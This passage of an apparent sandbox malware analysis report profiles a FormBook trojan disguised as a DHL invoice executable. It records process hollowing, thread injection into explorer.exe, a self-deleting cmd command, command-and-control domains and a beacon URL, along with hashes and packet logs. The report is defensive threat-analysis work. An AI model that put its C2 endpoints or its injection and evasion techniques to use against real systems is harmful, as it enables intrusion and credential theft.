          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C600 mov eax, dword ptr fs:[00000030h]11_2_0490C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04938E00 mov eax, dword ptr fs:[00000030h]11_2_04938E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1608 mov eax, dword ptr fs:[00000030h]11_2_049C1608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04918A0A mov eax, dword ptr fs:[00000030h]11_2_04918A0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BFE3F mov eax, dword ptr fs:[00000030h]11_2_049BFE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490E620 mov eax, dword ptr fs:[00000030h]11_2_0490E620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04944A2C mov eax, dword ptr fs:[00000030h]11_2_04944A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04944A2C mov eax, dword ptr fs:[00000030h]11_2_04944A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CEA55 mov eax, dword ptr fs:[00000030h]11_2_049CEA55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04994257 mov eax, dword ptr fs:[00000030h]11_2_04994257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]11_2_04909240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]11_2_04909240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]11_2_04909240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]11_2_04909240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]11_2_04917E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CAE44 mov eax, dword ptr fs:[00000030h]11_2_049CAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CAE44 mov eax, dword ptr fs:[00000030h]11_2_049CAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]11_2_0492AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]11_2_0492AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]11_2_0492AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]11_2_0492AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]11_2_0492AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494927A mov eax, dword ptr fs:[00000030h]11_2_0494927A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BB260 mov eax, dword ptr fs:[00000030h]11_2_049BB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BB260 mov eax, dword ptr fs:[00000030h]11_2_049BB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491766D mov eax, dword ptr fs:[00000030h]11_2_0491766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8A62 mov eax, dword ptr fs:[00000030h]11_2_049D8A62
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493B390 mov eax, dword ptr fs:[00000030h]11_2_0493B390
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932397 mov eax, dword ptr fs:[00000030h]11_2_04932397
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04918794 mov eax, dword ptr fs:[00000030h]11_2_04918794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]11_2_04987794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]11_2_04987794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]11_2_04987794
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Code function: 3_2_0040ACF0 LdrLoadDll
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Network Connect: 44.227.76.166 80
          Source: C:\Windows\explorer.exe; Domain query: www.mimamincloor.com
          Source: C:\Windows\explorer.exe; Domain query: www.federaldados.design
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: B30000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Memory written: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msdt.exe; Thread register set: target process: 3440
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Process created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
          Source: C:\Windows\SysWOW64\msdt.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: explorer.exe, 00000005.00000000.403617766.00000000083E8000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.398386364.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.364857450.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.396982165.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425085384.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383606390.00000000008B8000.00000004.00000020.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmp; Binary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Queries volume information: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          [Behavior graph, ID: 532858, start date: 02/12/2021, architecture: WINDOWS, score: 100. Process chain: invoice dhl.delivery document and original invoice sign.exe (started) -> invoice dhl.delivery document and original invoice sign.exe (injected) -> explorer.exe (started) -> msdt.exe (started) -> cmd.exe (started) -> conhost.exe]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          invoice dhl.delivery document and original invoice sign.exe | 29% | ReversingLabs | Win32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          www.cuteprofessionalscrubs.com/9gr5/ | 0% | Avira URL Cloud | safe
          http://www.federaldados.design/9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== | 0% | Avira URL Cloud | safe
          http://federaldados.design | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          pixie.porkbun.com | 44.227.76.166 | true | false | | high
          www.mimamincloor.com | unknown | unknown | true | | unknown
          www.federaldados.design | unknown | unknown | true | | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                www.cuteprofessionalscrubs.com/9gr5/ | true | Avira URL Cloud: safe | low
                http://www.federaldados.design/9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.397083667.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383799342.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425291445.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmp | false | | high
                http://federaldados.design | msdt.exe, 0000000B.00000002.623782144.00000000052FF000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown

                  Contacted IPs

                  Public

                  IP | Domain | Country | ASN | ASN Name | Malicious
                  44.227.76.166 | pixie.porkbun.com | United States | 16509 | AMAZON-02US | false

                  General Information

                  Joe Sandbox Version: 34.0.0 Boulder Opal
                  Analysis ID: 532858
                  Start date: 02.12.2021
                  Start time: 18:56:21
                  Joe Sandbox Product: CloudBasic
                  Overall analysis duration: 0h 11m 8s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Sample file name: invoice dhl.delivery document and original invoice sign.exe
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed: 24
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Detection: MAL
                  Classification: mal100.troj.evad.winEXE@7/1@2/1
                  EGA Information: Failed
                  HDC Information:
                  • Successful, ratio: 10.1% (good quality ratio 9%)
                  • Quality average: 69.7%
                  • Quality standard deviation: 32.8%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 88
                  • Number of non-executed functions: 158
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 92.122.145.220
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes were analyzed, report is missing behavior information
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532858/sample/invoice dhl.delivery document and original invoice sign.exe

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  18:57:23 | API Interceptor | 1x Sleep call for process: invoice dhl.delivery document and original invoice sign.exe modified

                  Joe Sandbox View / Context

                  IPs


                  Domains


                  ASN


                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice dhl.delivery document and original invoice sign.exe.log
                  Process:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1310
                  Entropy (8bit):5.345651901398759
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                  MD5:D918C6A765EDB90D2A227FE23A3FEC98
                  SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                  SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                  SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.790881583355775
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:invoice dhl.delivery document and original invoice sign.exe
                  File size:449536
                  MD5:ebce26da75669d94dbc0550bf394b204
                  SHA1:bcc8f769e51cd9f8a160e58840f80a008e2b72e2
                  SHA256:5fef546d71e9ed9f2e457bfd9aeb23a42a5074af37599c7fe4dcfeb8f687723c
                  SHA512:0e87adccb6d3ca4ea2ee2e101a20ea81437e3f774dd3296c264c92ce763adacacbe1a8a4b9b6226c0b8403569c716fd5fcc55820ea4a0575172d396bae432ed0
                  SSDEEP:12288:pY6XjcPK3hl0If0PufZptLKxO5J/jJUf7b3:LXjSKgIf8ufTtLPlqfP
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i..a................................. ........@.. .......................@............@................................

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x46f0be
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x61A89569 [Thu Dec 2 09:44:09 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:v4.0.30319
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6f064 | 0x57 | .text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0x4c0 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0xc | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x2000 | 0x6d0c4 | 0x6d200 | False | 0.883519473081 | data | 7.80084963355 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc | 0x70000 | 0x4c0 | 0x600 | False | 0.37890625 | data | 4.67278801338 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0x72000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  Name | RVA | Size | Type | Language | Country
                  RT_VERSION | 0x700a0 | 0x26c | data | |
                  RT_MANIFEST | 0x7030c | 0x1b4 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | |

                  Imports

                  DLL | Import
                  mscoree.dll | _CorExeMain

                  Version Infos

                  Description | Data
                  Translation | 0x0000 0x04b0
                  LegalCopyright |
                  Assembly Version | 0.0.0.0
                  InternalName | CMSFILEWRITABLETY.exe
                  FileVersion | 0.0.0.0
                  ProductVersion | 0.0.0.0
                  FileDescription |
                  OriginalFilename | CMSFILEWRITABLETY.exe

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Dec 2, 2021 18:58:54.959861994 CET | 49792 | 80 | 192.168.2.6 | 44.227.76.166
                  Dec 2, 2021 18:58:55.153683901 CET | 80 | 49792 | 44.227.76.166 | 192.168.2.6
                  Dec 2, 2021 18:58:55.153938055 CET | 49792 | 80 | 192.168.2.6 | 44.227.76.166
                  Dec 2, 2021 18:58:55.346704960 CET | 80 | 49792 | 44.227.76.166 | 192.168.2.6
                  Dec 2, 2021 18:58:55.346857071 CET | 49792 | 80 | 192.168.2.6 | 44.227.76.166
                  Dec 2, 2021 18:58:55.539767981 CET | 80 | 49792 | 44.227.76.166 | 192.168.2.6
                  Dec 2, 2021 18:58:55.542661905 CET | 80 | 49792 | 44.227.76.166 | 192.168.2.6
                  Dec 2, 2021 18:58:55.542689085 CET | 80 | 49792 | 44.227.76.166 | 192.168.2.6
                  Dec 2, 2021 18:58:55.542970896 CET | 49792 | 80 | 192.168.2.6 | 44.227.76.166
                  Dec 2, 2021 18:58:55.542995930 CET | 49792 | 80 | 192.168.2.6 | 44.227.76.166
                  Dec 2, 2021 18:58:55.735187054 CET | 80 | 49792 | 44.227.76.166 | 192.168.2.6

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Dec 2, 2021 18:58:54.919909000 CET | 50339 | 53 | 192.168.2.6 | 8.8.8.8
                  Dec 2, 2021 18:58:54.948086977 CET | 53 | 50339 | 8.8.8.8 | 192.168.2.6
                  Dec 2, 2021 18:59:16.066459894 CET | 63307 | 53 | 192.168.2.6 | 8.8.8.8
                  Dec 2, 2021 18:59:16.090806007 CET | 53 | 63307 | 8.8.8.8 | 192.168.2.6

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Dec 2, 2021 18:58:54.919909000 CET | 192.168.2.6 | 8.8.8.8 | 0x5c14 | Standard query (0) | www.federaldados.design | A (IP address) | IN (0x0001)
                  Dec 2, 2021 18:59:16.066459894 CET | 192.168.2.6 | 8.8.8.8 | 0xb04d | Standard query (0) | www.mimamincloor.com | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Dec 2, 2021 18:58:54.948086977 CET | 8.8.8.8 | 192.168.2.6 | 0x5c14 | No error (0) | www.federaldados.design | pixie.porkbun.com | | CNAME (Canonical name) | IN (0x0001)
                  Dec 2, 2021 18:58:54.948086977 CET | 8.8.8.8 | 192.168.2.6 | 0x5c14 | No error (0) | pixie.porkbun.com | | 44.227.76.166 | A (IP address) | IN (0x0001)
                  Dec 2, 2021 18:58:54.948086977 CET | 8.8.8.8 | 192.168.2.6 | 0x5c14 | No error (0) | pixie.porkbun.com | | 44.227.65.245 | A (IP address) | IN (0x0001)
